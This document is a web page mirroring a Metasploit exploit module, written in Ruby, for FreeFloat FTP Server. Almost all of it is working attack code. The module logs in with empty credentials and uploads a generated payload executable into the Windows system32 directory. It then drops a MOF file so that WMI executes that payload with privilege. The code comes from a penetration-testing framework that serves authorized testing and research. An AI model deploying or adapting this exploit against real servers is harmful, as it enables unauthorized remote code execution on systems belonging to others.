Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/ftp/freefloatftp_wbem.rb
19812 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ExcellentRanking

8


9
  include Msf::Exploit::Remote::Ftp

10
  include Msf::Exploit::Remote::TcpServer

11
  include Msf::Exploit::EXE

12
  include Msf::Exploit::WbemExec

13
  include Msf::Exploit::FileDropper

14


15
  def initialize(info = {})

16
    super(

17
      update_info(

18
        info,

19
        'Name' => "FreeFloat FTP Server Arbitrary File Upload",

20
        'Description' => %q{

21
          This module abuses multiple issues in FreeFloat: 1. No credential is actually

22
          needed to login; 2. User's default path is in C:\, and this cannot be changed;

23
          3. User can write to anywhere on the server's file system.  As a result of these

24
          poor implementations, a malicious user can just log in and then upload files,

25
          and let WMI (Management Instrumentation service) to execute the payload uploaded.

26
        },

27
        'License' => MSF_LICENSE,

28
        'Author' => [

29
          'sinn3r', # Vulnerability discovery, Metasploit module

30
          'juan vazquez' # Metasploit module

31
        ],

32
        'References' => [

33
          ['OSVDB', '88302'],

34
          ['OSVDB', '88303']

35
        ],

36
        'Platform' => 'win',

37
        'Targets' => [

38
          ['FreeFloat', {}]

39
        ],

40
        'Privileged' => true,

41
        'DisclosureDate' => '2012-12-07',

42
        'DefaultTarget' => 0,

43
        'Notes' => {

44
          'Reliability' => UNKNOWN_RELIABILITY,

45
          'Stability' => UNKNOWN_STABILITY,

46
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

47
        }

48
      )

49
    )

50


51
    register_options(

52
      [

53
        # Change the default description so this option makes sense

54
        OptPort.new('SRVPORT', [true, 'The local port to listen on for active mode', 8080])

55
      ]

56
    )

57


58
    deregister_options('FTPUSER', 'FTPPASS') # Using empty user and password

59
  end

60


61
  def check

62
    connect

63
    disconnect

64


65
    if banner =~ /FreeFloat/

66
      return Exploit::CheckCode::Detected

67
    else

68
      return Exploit::CheckCode::Safe

69
    end

70
  end

71


72
  def on_client_connect(cli)

73
    peer = "#{cli.peerhost}:#{cli.peerport}"

74


75
    case @stage

76
    when :exe

77
      print_status("Sending executable (#{@exe.length.to_s} bytes)")

78
      cli.put(@exe)

79
      @stage = :mof

80


81
    when :mof

82
      print_status("Sending MOF (#{@mof.length.to_s} bytes)")

83
      cli.put(@mof)

84
    end

85


86
    cli.close

87
  end

88


89
  def upload(filename)

90
    select(nil, nil, nil, 1)

91


92
    peer = "#{rhost}:#{rport}"

93
    print_status("Trying to upload #{::File.basename(filename)}")

94


95
    conn = connect(false, datastore['VERBOSE'])

96


97
    print_status("Sending empty login...")

98


99
    res = send_user("", conn)

100
    if not res or res !~ /331/

101
      print_error("Error sending username")

102
      return false

103
    end

104


105
    res = send_pass("", conn)

106
    if not res or res !~ /230/

107
      print_error("Error sending password")

108
      return false

109
    end

110


111
    print_good("Empty authentication was successful")

112


113
    # Switch to binary mode

114
    print_status("Set binary mode")

115
    send_cmd(['TYPE', 'I'], true, conn)

116


117
    # Prepare active mode: Get attacker's IP and source port

118
    src_ip = datastore['SRVHOST'] == '0.0.0.0' ? Rex::Socket.source_address : datastore['SRVHOST']

119
    src_port = datastore['SRVPORT'].to_i

120


121
    # Prepare active mode: Convert the IP and port for active mode

122
    src_ip = src_ip.gsub(/\./, ',')

123
    src_port = "#{src_port / 256},#{src_port.remainder(256)}"

124


125
    # Set to active mode

126
    print_status("Set active mode \"#{src_ip},#{src_port}\"")

127
    send_cmd(['PORT', "#{src_ip},#{src_port}"], true, conn)

128


129
    # Tell the FTP server to download our file

130
    send_cmd(['STOR', filename], false, conn)

131


132
    disconnect(conn)

133
  end

134


135
  def exploit

136
    exe_name = "WINDOWS/system32/#{rand_text_alpha(rand(10) + 5)}.exe"

137
    mof_name = "WINDOWS/system32/wbem/mof/#{rand_text_alpha(rand(10) + 5)}.mof"

138
    @mof = generate_mof(::File.basename(mof_name), ::File.basename(exe_name))

139
    @exe = generate_payload_exe

140
    @stage = :exe

141


142
    begin

143
      t = framework.threads.spawn("reqs", false) {

144
        begin

145
          # Upload our malicious executable

146
          u = upload(exe_name)

147
          # Upload the mof file

148
          upload(mof_name) if u

149
          register_file_for_cleanup("#{::File.basename(exe_name)}")

150
          register_file_for_cleanup("wbem\\mof\\good\\#{::File.basename(mof_name)}")

151
        rescue ::Exception => e

152
          print_error "Upload Failed: #{e.message}"

153
          cleanup

154
        end

155
      }

156
      super

157
    ensure

158
      t.kill

159
    end

160
  end

161
end

162


163